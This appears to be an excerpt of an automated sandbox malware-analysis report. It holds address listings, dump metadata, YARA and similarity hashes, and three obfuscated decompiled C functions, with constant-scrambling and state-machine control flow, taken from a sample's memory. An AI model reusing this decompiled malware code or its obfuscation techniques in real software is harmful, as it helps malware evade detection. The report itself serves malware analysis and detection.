                                                                                                          0x02aea4e8
                                                                                                          0x02aea4f0
                                                                                                          0x02aea4fb
                                                                                                          0x02aea500
                                                                                                          0x02aea506
                                                                                                          0x02aea50e
                                                                                                          0x02aea516
                                                                                                          0x02aea51e
                                                                                                          0x02aea526
                                                                                                          0x02aea52b
                                                                                                          0x02aea533
                                                                                                          0x02aea53f
                                                                                                          0x02aea542
                                                                                                          0x02aea54b
                                                                                                          0x02aea554
                                                                                                          0x02aea558
                                                                                                          0x02aea560
                                                                                                          0x02aea568
                                                                                                          0x02aea570
                                                                                                          0x02aea578
                                                                                                          0x02aea580
                                                                                                          0x02aea588
                                                                                                          0x02aea595
                                                                                                          0x02aea599
                                                                                                          0x02aea5a1
                                                                                                          0x02aea5a9
                                                                                                          0x02aea5b1
                                                                                                          0x02aea5b9
                                                                                                          0x02aea5be
                                                                                                          0x02aea5c6
                                                                                                          0x02aea5ce
                                                                                                          0x02aea5d6
                                                                                                          0x02aea5de
                                                                                                          0x02aea5e6
                                                                                                          0x02aea5ea
                                                                                                          0x02aea5f2
                                                                                                          0x02aea5fa
                                                                                                          0x02aea602
                                                                                                          0x02aea60a
                                                                                                          0x02aea612
                                                                                                          0x02aea61a
                                                                                                          0x02aea622
                                                                                                          0x02aea62a
                                                                                                          0x02aea632
                                                                                                          0x02aea63a
                                                                                                          0x02aea647
                                                                                                          0x02aea64b
                                                                                                          0x02aea653
                                                                                                          0x02aea65b
                                                                                                          0x02aea663
                                                                                                          0x02aea66b
                                                                                                          0x02aea673
                                                                                                          0x02aea67b
                                                                                                          0x02aea683
                                                                                                          0x02aea68b
                                                                                                          0x02aea698
                                                                                                          0x02aea6a1
                                                                                                          0x02aea6a5
                                                                                                          0x02aea6ad
                                                                                                          0x02aea6b5
                                                                                                          0x02aea6bd
                                                                                                          0x02aea6c5
                                                                                                          0x02aea6c9
                                                                                                          0x02aea6d1
                                                                                                          0x02aea6d9
                                                                                                          0x02aea6e3
                                                                                                          0x02aea6e7
                                                                                                          0x02aea6ef
                                                                                                          0x02aea6f7
                                                                                                          0x02aea6ff
                                                                                                          0x02aea707
                                                                                                          0x02aea70b
                                                                                                          0x02aea70f
                                                                                                          0x02aea713
                                                                                                          0x02aea713
                                                                                                          0x02aea713
                                                                                                          0x02aea716
                                                                                                          0x02aea716
                                                                                                          0x02aea716
                                                                                                          0x02aea71b
                                                                                                          0x00000000
                                                                                                          0x02aea71b
                                                                                                          0x02aea729
                                                                                                          0x02aea7f0
                                                                                                          0x02aea7f5
                                                                                                          0x02aea7f8
                                                                                                          0x02aea801
                                                                                                          0x02aea806
                                                                                                          0x02aea80b
                                                                                                          0x00000000
                                                                                                          0x02aea72f
                                                                                                          0x02aea735
                                                                                                          0x02aea85f
                                                                                                          0x02aea73b
                                                                                                          0x02aea741
                                                                                                          0x02aea7bd
                                                                                                          0x02aea7c2
                                                                                                          0x02aea7c4
                                                                                                          0x02aea7c9
                                                                                                          0x02aea7cf
                                                                                                          0x00000000
                                                                                                          0x02aea7cf
                                                                                                          0x02aea743
                                                                                                          0x02aea749
                                                                                                          0x02aea7a2
                                                                                                          0x00000000
                                                                                                          0x02aea74b
                                                                                                          0x02aea751
                                                                                                          0x02aea77f
                                                                                                          0x02aea785
                                                                                                          0x02aea790
                                                                                                          0x02aea78d
                                                                                                          0x02aea78d
                                                                                                          0x02aea795
                                                                                                          0x02aea798
                                                                                                          0x00000000
                                                                                                          0x02aea753
                                                                                                          0x02aea759
                                                                                                          0x00000000
                                                                                                          0x02aea75f
                                                                                                          0x02aea770
                                                                                                          0x02aea775
                                                                                                          0x02aea778
                                                                                                          0x02aea713
                                                                                                          0x02aea713
                                                                                                          0x02aea713
                                                                                                          0x02aea716
                                                                                                          0x02aea716
                                                                                                          0x00000000
                                                                                                          0x02aea716
                                                                                                          0x02aea713
                                                                                                          0x02aea759
                                                                                                          0x02aea751
                                                                                                          0x02aea749
                                                                                                          0x02aea741
                                                                                                          0x02aea735
                                                                                                          0x02aea867
                                                                                                          0x02aea870
                                                                                                          0x02aea870
                                                                                                          0x02aea823
                                                                                                          0x02aea828
                                                                                                          0x02aea830
                                                                                                          0x02aea835
                                                                                                          0x02aea838
                                                                                                          0x02aea83f
                                                                                                          0x02aea840
                                                                                                          0x02aea840
                                                                                                          0x00000000
                                                                                                          0x02aea84c
                                                                                                          0x02aea716

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )$B:o$kb
                                                                                                          • API String ID: 0-1085388577
                                                                                                          • Opcode ID: 85bfb39ab626f5f88cacdb92635877f0ec4070c57be251aa582b2c4e3ec5e739
                                                                                                          • Instruction ID: 928e6d529120fb1ffb49cead7efb0526220a00704bf740a376b8ad667e4fc80a
                                                                                                          • Opcode Fuzzy Hash: 85bfb39ab626f5f88cacdb92635877f0ec4070c57be251aa582b2c4e3ec5e739
                                                                                                          • Instruction Fuzzy Hash: BCA132714083419FC798CF65C99A41BBBF1FBC4758F009A2DF59A96260D7B1890ACF83
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFBEFD, Relevance: 4.0, Strings: 3, Instructions: 201COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AFBEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v616;
				void* _t242;
				void* _t243;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t285;

				_v52 = 0xa5be;
				_t251 = 0x16;
				_v52 = _v52 / _t251;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0005c33b;
				_v48 = 0xc42d20;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 + 0xffffc4d0;
				_v48 = _v48 ^ 0xfffeda29;
				_v72 = 0x4321a7;
				_v72 = _v72 | 0xa4ce3c40;
				_v72 = _v72 ^ 0xa4cab40f;
				_v24 = 0x227e38;
				_t25 =  &_v24; // 0x227e38
				_t252 = 0x2c;
				_v24 =  *_t25 * 0x3c;
				_t27 =  &_v24; // 0x227e38
				_v24 =  *_t27 * 0x66;
				_t29 =  &_v24; // 0x227e38
				_v24 =  *_t29 / _t252;
				_v24 = _v24 ^ 0x014a285a;
				_v60 = 0xfcfbbc;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x000d93d1;
				_v96 = 0xf80007;
				_v96 = _v96 + 0xaa36;
				_v96 = _v96 ^ 0x00fda443;
				_v80 = 0x5511cc;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x00043fa8;
				_v88 = 0xbb6e3f;
				_v88 = _v88 + 0xffffbcf0;
				_v88 = _v88 ^ 0x00b4c382;
				_v8 = 0x49da65;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0002f4aa;
				_v16 = 0xc843f1;
				_t253 = 0x50;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x9e242cdc;
				_v16 = _v16 + 0xffff9a81;
				_v16 = _v16 ^ 0x9e230a73;
				_v36 = 0x2e6bc5;
				_v36 = _v36 | 0x2558a4e0;
				_v36 = _v36 + 0xfffff4e9;
				_v36 = _v36 ^ 0x257724e9;
				_v12 = 0x80a3b9;
				_t254 = 0x6f;
				_v12 = _v12 * 0x79;
				_v12 = _v12 + 0xffff3c67;
				_v12 = _v12 | 0xeef82a75;
				_v12 = _v12 ^ 0xfef88c24;
				_v68 = 0x7db499;
				_v68 = _v68 + 0xffff3f49;
				_v68 = _v68 ^ 0x007e0dc2;
				_v44 = 0x9f49e4;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x1368a87d;
				_v44 = _v44 ^ 0xfa51dcf6;
				_v64 = 0x98f463;
				_v64 = _v64 / _t254;
				_v64 = _v64 ^ 0x0008fd0c;
				_v76 = 0x12aedd;
				_v76 = _v76 + 0xf7e7;
				_v76 = _v76 ^ 0x001c1bc6;
				_v28 = 0x4e33bd;
				_t255 = 3;
				_v28 = _v28 / _t255;
				_t256 = 0x48;
				_v28 = _v28 / _t256;
				_t257 = 0x1b;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x002c0e7b;
				_v20 = 0x6739f6;
				_v20 = _v20 * 0x51;
				_v20 = _v20 + 0x822b;
				_v20 = _v20 + 0xffff6302;
				_v20 = _v20 ^ 0x20a7052c;
				_v40 = 0xf776a1;
				_v40 = _v40 | 0xfaf9a8ad;
				_v40 = _v40 + 0xffffa6b3;
				_v40 = _v40 ^ 0xfaf95b8b;
				_v56 = 0xfd0dae;
				_v56 = _v56 / _t257;
				_t258 = 0x23;
				_v56 = _v56 / _t258;
				_v56 = _v56 ^ 0x000358d4;
				_v32 = 0xe62709;
				_v32 = _v32 + 0xffff3f09;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0009f673;
				_v92 = 0xdc059c;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0dc87abe;
				_v84 = 0xab2272;
				_t259 = 0xb;
				_v84 = _v84 / _t259;
				_v84 = _v84 ^ 0x0001c613;
				_t285 =  *0x2b06214; // 0x0
				_t242 = E02AF09DD(_v52, _t285 + 0x23c, _v48, _v72);
				_t293 = _a4 + 0x2c;
				_t243 = E02B0061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
				_t302 = _t243;
				if(_t243 != 0) {
					_push(_v16);
					_push(_v8);
					_push(_v88);
					E02B02D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E02AFE1F8(0x2ae1000, _v80, _t302));
					E02AFFECB(_t246, _v76, _v28, _v20, _v40);
					E02AED061( &_v616, _v56, _v32, _v92, _v84);
				}
				return 1;
			}







































                                                                                                          0x02afbf06
                                                                                                          0x02afbf15
                                                                                                          0x02afbf1a
                                                                                                          0x02afbf1f
                                                                                                          0x02afbf23
                                                                                                          0x02afbf2a
                                                                                                          0x02afbf31
                                                                                                          0x02afbf35
                                                                                                          0x02afbf3c
                                                                                                          0x02afbf43
                                                                                                          0x02afbf4a
                                                                                                          0x02afbf51
                                                                                                          0x02afbf58
                                                                                                          0x02afbf5f
                                                                                                          0x02afbf63
                                                                                                          0x02afbf66
                                                                                                          0x02afbf69
                                                                                                          0x02afbf6d
                                                                                                          0x02afbf70
                                                                                                          0x02afbf77
                                                                                                          0x02afbf7a
                                                                                                          0x02afbf81
                                                                                                          0x02afbf88
                                                                                                          0x02afbf8c
                                                                                                          0x02afbf93
                                                                                                          0x02afbf9a
                                                                                                          0x02afbfa1
                                                                                                          0x02afbfa8
                                                                                                          0x02afbfaf
                                                                                                          0x02afbfb3
                                                                                                          0x02afbfba
                                                                                                          0x02afbfc1
                                                                                                          0x02afbfc8
                                                                                                          0x02afbfcf
                                                                                                          0x02afbfd6
                                                                                                          0x02afbfda
                                                                                                          0x02afbfde
                                                                                                          0x02afbfe2
                                                                                                          0x02afbfe9
                                                                                                          0x02afbff3
                                                                                                          0x02afbff8
                                                                                                          0x02afbffd
                                                                                                          0x02afc004
                                                                                                          0x02afc00b
                                                                                                          0x02afc012
                                                                                                          0x02afc019
                                                                                                          0x02afc020
                                                                                                          0x02afc027
                                                                                                          0x02afc02e
                                                                                                          0x02afc039
                                                                                                          0x02afc03a
                                                                                                          0x02afc03d
                                                                                                          0x02afc044
                                                                                                          0x02afc04b
                                                                                                          0x02afc052
                                                                                                          0x02afc059
                                                                                                          0x02afc060
                                                                                                          0x02afc067
                                                                                                          0x02afc06e
                                                                                                          0x02afc072
                                                                                                          0x02afc079
                                                                                                          0x02afc080
                                                                                                          0x02afc08c
                                                                                                          0x02afc08f
                                                                                                          0x02afc096
                                                                                                          0x02afc09f
                                                                                                          0x02afc0a6
                                                                                                          0x02afc0ad
                                                                                                          0x02afc0b9
                                                                                                          0x02afc0be
                                                                                                          0x02afc0c6
                                                                                                          0x02afc0cb
                                                                                                          0x02afc0d4
                                                                                                          0x02afc0d7
                                                                                                          0x02afc0da
                                                                                                          0x02afc0e1
                                                                                                          0x02afc0ec
                                                                                                          0x02afc0ef
                                                                                                          0x02afc0f6
                                                                                                          0x02afc0fd
                                                                                                          0x02afc104
                                                                                                          0x02afc10b
                                                                                                          0x02afc112
                                                                                                          0x02afc119
                                                                                                          0x02afc120
                                                                                                          0x02afc12e
                                                                                                          0x02afc134
                                                                                                          0x02afc139
                                                                                                          0x02afc13e
                                                                                                          0x02afc145
                                                                                                          0x02afc14c
                                                                                                          0x02afc153
                                                                                                          0x02afc157
                                                                                                          0x02afc15e
                                                                                                          0x02afc165
                                                                                                          0x02afc169
                                                                                                          0x02afc170
                                                                                                          0x02afc17a
                                                                                                          0x02afc17d
                                                                                                          0x02afc180
                                                                                                          0x02afc18d
                                                                                                          0x02afc19c
                                                                                                          0x02afc1ad
                                                                                                          0x02afc1b3
                                                                                                          0x02afc1bb
                                                                                                          0x02afc1bd
                                                                                                          0x02afc1c0
                                                                                                          0x02afc1c8
                                                                                                          0x02afc1cb
                                                                                                          0x02afc1fa
                                                                                                          0x02afc20d
                                                                                                          0x02afc224
                                                                                                          0x02afc22c
                                                                                                          0x02afc234

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpi
                                                                                                          • String ID: '$8~"$$w%
                                                                                                          • API String ID: 1586166983-1780403920
                                                                                                          • Opcode ID: 0e33b27737ef5cf48100d5254f08aff092b339e22a5d16a02e53ad51c55a08e1
                                                                                                          • Instruction ID: 2bb68519fa2b6f87311893333478324f3b2a15d5c7fc55cd9e7c1e039556c423
                                                                                                          • Opcode Fuzzy Hash: 0e33b27737ef5cf48100d5254f08aff092b339e22a5d16a02e53ad51c55a08e1
                                                                                                          • Instruction Fuzzy Hash: 11A12171D0020DEBDF18CFE1D98A9DEBBB2FB44314F208159E511BA264D7B41A5ACF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFD8DB, Relevance: 3.9, Strings: 3, Instructions: 157COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02AFD8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t128;
				signed int _t142;
				signed int _t153;
				signed int _t155;
				signed int* _t163;
				void* _t164;
				signed int* _t167;

				_push(_a8);
				_t163 = __edx;
				_t153 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t128);
				_v104 = 0xcf676c;
				_t167 =  &(( &_v116)[4]);
				_v104 = _v104 + 0xb3f2;
				_v104 = _v104 | 0x988d6f24;
				_t164 = 0x3ef4407;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0xbfbf0000;
				_v68 = 0xc42241;
				_v68 = _v68 + 0x399a;
				_v68 = _v68 ^ 0x00ce5291;
				_v88 = 0x75dd03;
				_v88 = _v88 + 0x7dba;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x0008d458;
				_v72 = 0x2f46be;
				_v72 = _v72 + 0xffffdb55;
				_v72 = _v72 ^ 0x002db90e;
				_v76 = 0x23e806;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000f8af6;
				_v116 = 0x607e6d;
				_v116 = _v116 << 0x10;
				_v116 = _v116 + 0xffff6686;
				_v116 = _v116 | 0x3d181bb2;
				_v116 = _v116 ^ 0x7f71bdaf;
				_v96 = 0x2cc21a;
				_v96 = _v96 | 0xe9438a5f;
				_t155 = 0x3a;
				_v96 = _v96 * 0x13;
				_v96 = _v96 ^ 0x5347ec85;
				_v108 = 0xb3af1a;
				_v108 = _v108 / _t155;
				_v108 = _v108 + 0x8361;
				_v108 = _v108 | 0x789ced77;
				_v108 = _v108 ^ 0x789572df;
				_v92 = 0x2d2920;
				_v92 = _v92 * 0x2c;
				_v92 = _v92 * 0x1e;
				_v92 = _v92 ^ 0xe8dd3266;
				_v80 = 0xc07fec;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x80fbd8c8;
				_v112 = 0xa84277;
				_v112 = _v112 + 0xffffed27;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0c742dd9;
				_v64 = 0x297b8a;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x0005dd25;
				_v84 = 0x5c8db2;
				_v84 = _v84 + 0x6b9b;
				_v84 = _v84 + 0x3228;
				_v84 = _v84 ^ 0x0059c37f;
				_v100 = 0xb4d8ec;
				_v100 = _v100 << 1;
				_v100 = _v100 + 0xe9ba;
				_v100 = _v100 | 0x2516dceb;
				_v100 = _v100 ^ 0x257d75fc;
				do {
					while(_t164 != 0x3ef4407) {
						if(_t164 == 0x3f5e611) {
							_push(_t155);
							_push(_t155);
							_t142 = E02AEC5D8(_t163[1]);
							_t167 =  &(_t167[3]);
							 *_t163 = _t142;
							__eflags = _t142;
							if(__eflags != 0) {
								_t164 = 0xddf020d;
								continue;
							}
						} else {
							if(_t164 == 0x4994ece) {
								E02AFCAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
							} else {
								if(_t164 == 0x4a51775) {
									_t155 = _t153;
									_t163[1] = E02AF6187(_t155);
									_t164 = 0x3f5e611;
									continue;
								} else {
									if(_t164 == 0x9d156cc) {
										_t155 = _v108;
										E02AF0A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
										_t167 =  &(_t167[4]);
										_t164 = 0x4994ece;
										continue;
									} else {
										if(_t164 != 0xddf020d) {
											goto L13;
										} else {
											_t155 = _t163;
											E02AE22A6(_t155, _v116,  &_v60, _v96);
											_t167 =  &(_t167[2]);
											_t164 = 0x9d156cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t163;
						_t127 =  *_t163 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					_t164 = 0x4a51775;
					 *_t163 =  *_t163 & 0x00000000;
					__eflags =  *_t163;
					_t163[1] = _v104;
					L13:
					__eflags = _t164 - 0xae42d9c;
				} while (__eflags != 0);
				goto L16;
			}

























                                                                                                          0x02afd8e2
                                                                                                          0x02afd8e9
                                                                                                          0x02afd8eb
                                                                                                          0x02afd8ed
                                                                                                          0x02afd8f4
                                                                                                          0x02afd8f5
                                                                                                          0x02afd8f6
                                                                                                          0x02afd8fb
                                                                                                          0x02afd903
                                                                                                          0x02afd906
                                                                                                          0x02afd910
                                                                                                          0x02afd918
                                                                                                          0x02afd91d
                                                                                                          0x02afd927
                                                                                                          0x02afd92f
                                                                                                          0x02afd937
                                                                                                          0x02afd93f
                                                                                                          0x02afd947
                                                                                                          0x02afd94f
                                                                                                          0x02afd957
                                                                                                          0x02afd95c
                                                                                                          0x02afd964
                                                                                                          0x02afd96c
                                                                                                          0x02afd974
                                                                                                          0x02afd97c
                                                                                                          0x02afd984
                                                                                                          0x02afd989
                                                                                                          0x02afd991
                                                                                                          0x02afd999
                                                                                                          0x02afd99e
                                                                                                          0x02afd9a6
                                                                                                          0x02afd9ae
                                                                                                          0x02afd9b6
                                                                                                          0x02afd9be
                                                                                                          0x02afd9cd
                                                                                                          0x02afd9ce
                                                                                                          0x02afd9d2
                                                                                                          0x02afd9da
                                                                                                          0x02afd9e8
                                                                                                          0x02afd9ec
                                                                                                          0x02afd9f4
                                                                                                          0x02afd9fc
                                                                                                          0x02afda04
                                                                                                          0x02afda11
                                                                                                          0x02afda1a
                                                                                                          0x02afda1e
                                                                                                          0x02afda26
                                                                                                          0x02afda2e
                                                                                                          0x02afda33
                                                                                                          0x02afda3b
                                                                                                          0x02afda43
                                                                                                          0x02afda50
                                                                                                          0x02afda59
                                                                                                          0x02afda5d
                                                                                                          0x02afda65
                                                                                                          0x02afda6d
                                                                                                          0x02afda72
                                                                                                          0x02afda7a
                                                                                                          0x02afda82
                                                                                                          0x02afda8a
                                                                                                          0x02afda92
                                                                                                          0x02afda9a
                                                                                                          0x02afdaa2
                                                                                                          0x02afdaa6
                                                                                                          0x02afdaae
                                                                                                          0x02afdab6
                                                                                                          0x02afdabe
                                                                                                          0x02afdabe
                                                                                                          0x02afdad0
                                                                                                          0x02afdb5e
                                                                                                          0x02afdb5f
                                                                                                          0x02afdb63
                                                                                                          0x02afdb68
                                                                                                          0x02afdb6b
                                                                                                          0x02afdb6d
                                                                                                          0x02afdb6f
                                                                                                          0x02afdb71
                                                                                                          0x00000000
                                                                                                          0x02afdb71
                                                                                                          0x02afdad2
                                                                                                          0x02afdad8
                                                                                                          0x02afdbaa
                                                                                                          0x02afdade
                                                                                                          0x02afdae4
                                                                                                          0x02afdb3a
                                                                                                          0x02afdb41
                                                                                                          0x02afdb44
                                                                                                          0x00000000
                                                                                                          0x02afdae6
                                                                                                          0x02afdaec
                                                                                                          0x02afdb27
                                                                                                          0x02afdb2b
                                                                                                          0x02afdb30
                                                                                                          0x02afdb33
                                                                                                          0x00000000
                                                                                                          0x02afdaee
                                                                                                          0x02afdaf0
                                                                                                          0x00000000
                                                                                                          0x02afdaf6
                                                                                                          0x02afdb03
                                                                                                          0x02afdb05
                                                                                                          0x02afdb0a
                                                                                                          0x02afdb0d
                                                                                                          0x00000000
                                                                                                          0x02afdb0d
                                                                                                          0x02afdaf0
                                                                                                          0x02afdaec
                                                                                                          0x02afdae4
                                                                                                          0x02afdad8
                                                                                                          0x02afdbb2
                                                                                                          0x02afdbb4
                                                                                                          0x02afdbb9
                                                                                                          0x02afdbb9
                                                                                                          0x02afdbc0
                                                                                                          0x02afdbc0
                                                                                                          0x02afdb7c
                                                                                                          0x02afdb81
                                                                                                          0x02afdb81
                                                                                                          0x02afdb84
                                                                                                          0x02afdb87
                                                                                                          0x02afdb87
                                                                                                          0x02afdb87
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )-$(2$m~`
                                                                                                          • API String ID: 0-2018184401
                                                                                                          • Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
                                                                                                          • Instruction ID: 84960c301c924158489e7e57ab1792d04d0f6612df75bd59a51433397beb27b7
                                                                                                          • Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
                                                                                                          • Instruction Fuzzy Hash: 737166B28083019FC395DF24D58541BBBF0BBC8358F404A1DF69A92220E7B5CA09CF87
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF9774, Relevance: 3.9, Strings: 3, Instructions: 149COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 89%
                                                                                                          			E02AF9774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t119;
				intOrPtr _t132;
				void* _t134;
				void* _t139;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;
				signed int* _t161;

				_push(_a24);
				_push(_a20);
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t119);
				_v16 = 0xc48506;
				_t161 =  &(( &_v52)[8]);
				_v16 = _v16 + 0xffffac5b;
				_v16 = _v16 ^ 0x00c0af73;
				_t158 = 0;
				_v36 = 0x37ec46;
				_t139 = 0x2fa1272;
				_t11 =  &_v36; // 0x37ec46
				_t154 = 0xf;
				_v36 =  *_t11 / _t154;
				_t155 = 0x17;
				_v36 = _v36 * 0x4d;
				_v36 = _v36 ^ 0x011f94eb;
				_v48 = 0x1c9307;
				_v48 = _v48 + 0xffff180a;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0x45e7;
				_v48 = _v48 ^ 0x000c030c;
				_v20 = 0x2c1c35;
				_v20 = _v20 * 0x1a;
				_v20 = _v20 ^ 0x04724ae3;
				_v52 = 0xfea2f7;
				_v52 = _v52 + 0xffffcd03;
				_v52 = _v52 << 0xf;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0374764b;
				_v24 = 0x4bca1;
				_v24 = _v24 + 0xffff92f8;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0004173d;
				_v28 = 0xca25f8;
				_v28 = _v28 ^ 0xf07fe4f1;
				_v28 = _v28 | 0xda5170b9;
				_v28 = _v28 ^ 0xfaf3c539;
				_v40 = 0x557f86;
				_v40 = _v40 / _t155;
				_v40 = _v40 | 0x36ce95b0;
				_v40 = _v40 + 0xffff3f34;
				_v40 = _v40 ^ 0x36c02d15;
				_v44 = 0x3d6d99;
				_t156 = 0x16;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x3bf21f86;
				_v32 = 0x4fb69d;
				_v32 = _v32 << 4;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x00344331;
				_v8 = 0x9d9959;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000ae1f8;
				_v12 = 0x98829;
				_v12 = _v12 ^ 0xb9c9dda7;
				_v12 = _v12 ^ 0xb9cd803a;
				_t157 = _v4;
				do {
					while(_t139 != 0x2fa1272) {
						if(_t139 == 0x306b7e5) {
							E02AEF9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
							_t161 =  &(_t161[9]);
							_t139 = 0xc6d7030;
							_t158 =  !=  ? 1 : _t158;
							continue;
						} else {
							if(_t139 == 0x66d181a) {
								_t132 = E02AFBC6B();
								_t157 = _t132;
								if(_t132 != 0xffffffff) {
									_t139 = 0xc4ce558;
									continue;
								}
							} else {
								if(_t139 == 0xc4ce558) {
									_t134 = E02AE72C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
									_t161 =  &(_t161[4]);
									if(_t134 != 0) {
										_t139 = 0x306b7e5;
										continue;
									}
								} else {
									if(_t139 != 0xc6d7030) {
										goto L14;
									} else {
										E02B01538(_v8, _v12, _v4);
									}
								}
							}
						}
						L7:
						return _t158;
					}
					_t139 = 0x66d181a;
					L14:
				} while (_t139 != 0xa576bfc);
				goto L7;
			}

























                                                                                                          0x02af977b
                                                                                                          0x02af9781
                                                                                                          0x02af9786
                                                                                                          0x02af9787
                                                                                                          0x02af978b
                                                                                                          0x02af978c
                                                                                                          0x02af9790
                                                                                                          0x02af9791
                                                                                                          0x02af9792
                                                                                                          0x02af9797
                                                                                                          0x02af979f
                                                                                                          0x02af97a2
                                                                                                          0x02af97ac
                                                                                                          0x02af97b4
                                                                                                          0x02af97b6
                                                                                                          0x02af97be
                                                                                                          0x02af97c3
                                                                                                          0x02af97c9
                                                                                                          0x02af97ce
                                                                                                          0x02af97d9
                                                                                                          0x02af97dc
                                                                                                          0x02af97e0
                                                                                                          0x02af97e8
                                                                                                          0x02af97f0
                                                                                                          0x02af97f8
                                                                                                          0x02af97fd
                                                                                                          0x02af9805
                                                                                                          0x02af980d
                                                                                                          0x02af981a
                                                                                                          0x02af981e
                                                                                                          0x02af9826
                                                                                                          0x02af982e
                                                                                                          0x02af9836
                                                                                                          0x02af983b
                                                                                                          0x02af9840
                                                                                                          0x02af9848
                                                                                                          0x02af9850
